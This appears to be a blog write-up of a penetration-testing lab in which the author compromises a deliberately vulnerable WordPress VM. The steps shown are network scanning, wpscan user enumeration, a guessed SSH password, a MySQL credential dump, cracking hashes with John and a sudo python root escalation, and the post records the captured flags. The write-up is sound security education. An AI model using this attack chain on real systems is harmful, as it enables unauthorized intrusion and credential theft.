This project began with getting access to a virtual machine running on Azure. The virtual host contained a hypervisor that managed 5 virtual machines:

• Kali Linux – used for pen testing
• Elk Server – for alerts and monitoring
• Capstone – exploited in a previous project, used to test alerts in the ELK server
• Target1 – the machine to be targeted here
• Target2 – coming soon….

The following describes the steps taken to enumerate the target machine, scan for vulnerabilities, gain access to user accounts and finally escalate privileges and capture all of the flags.

Scan the network to identify the IP address of the target machine (Target1)

Using ‘netdiscover’ I can see the different IPs available within the Azure Virtual Network

Trying these IP addresses in a browser reveals the Target1 machine as 192.168.1.110

Document all exposed ports and services

$ nmap -sV -p- 192.168.1.110

nmap shows the following open ports

This shows that ports 80 (http via apache) and 22 (ssh) are open

Clicking on the links in the nav shows a blog with the URL: 192.168.1.110/wordpress

 

 

Enumerate the WordPress site.

$ wpscan --url 192.168.1.110/wordpress --enumerate vp,u 

This will scan WordPress for vulnerable plugins and users

The result shows the following users:

 

 

Use SSH to gain a user shell

$ssh [email protected]

Guessed the password as ‘michael’ and gained a shell

Since the machine is running the site on apache I navigated to the /var/www directory

In this directory, there is a file called flag2.txt

flag2:fc3fd58dcdad9ab23faca6e9a36e581c

Then I navigated to the /var/www/html directory

I did a search for any flags in the directory and found flag1 hidden in a comment tag in the service.html file

flag1:b9bbcb33e11b80be759c4e844862482d

Find the MySQL database password.

Since WordPress sites have configuration data saved in files on the file system decided to take a look at /var/www/html/wordpress/wp-config.php

Found the mysql login information

Use the credentials to log into MySQL and dump WordPress user password hashes.

In order to see the contents of the database logged into mysql with the following

$mysql -u root -p

entered password ‘R@v3nSecurity’

mysql> use wordpress

mysql> show tables;

Took a look in the wp_users table

mysql> SELECT * FROM wp_users;

Can see hashed passwords for Michael and Steven

Crack password hashes with John

Created a file wp_hashes.txt with the usernames and passwords found in the Worpress users database table

$john wp_hashes.txt 

Steven’s password is ‘pink84’

Then I logged into the WordPress admin UI with steven:pink84

Navigated to Posts and see and unpublished draft called ‘flag3’

flag3:afc01ab56b50591e7dccf93122770cd2

 

 

Secure a user shell as the user whose password you cracked.

$ssh [email protected]

password: pink84

ran

$sudo -l 

to see what the user would be able to run as sudo

This reveals that Steven can run python commands as root withouth a password

Did a google search to see if there is a python command that can escalate privleges to root

$sudo python -c 'import pty;pty.spawn("/bin/bash")'

Looked in the root directory

flag4:715dea6c055b9fe3337544932f2941ce

 

 

Result: All 4 flags

• flag1:b9bbcb33e11b80be759c4e844862482d
• flag2:fc3fd58dcdad9ab23faca6e9a36e581c
• flag3:afc01ab56b50591e7dccf93122770cd2
• flag4:715dea6c055b9fe3337544932f2941ce

In the next post, I will go over steps a site admin can take to harden the Raven Security server against future attacks and also create an ansible playbook that can be used to harden other servers with similar vulnerabilities.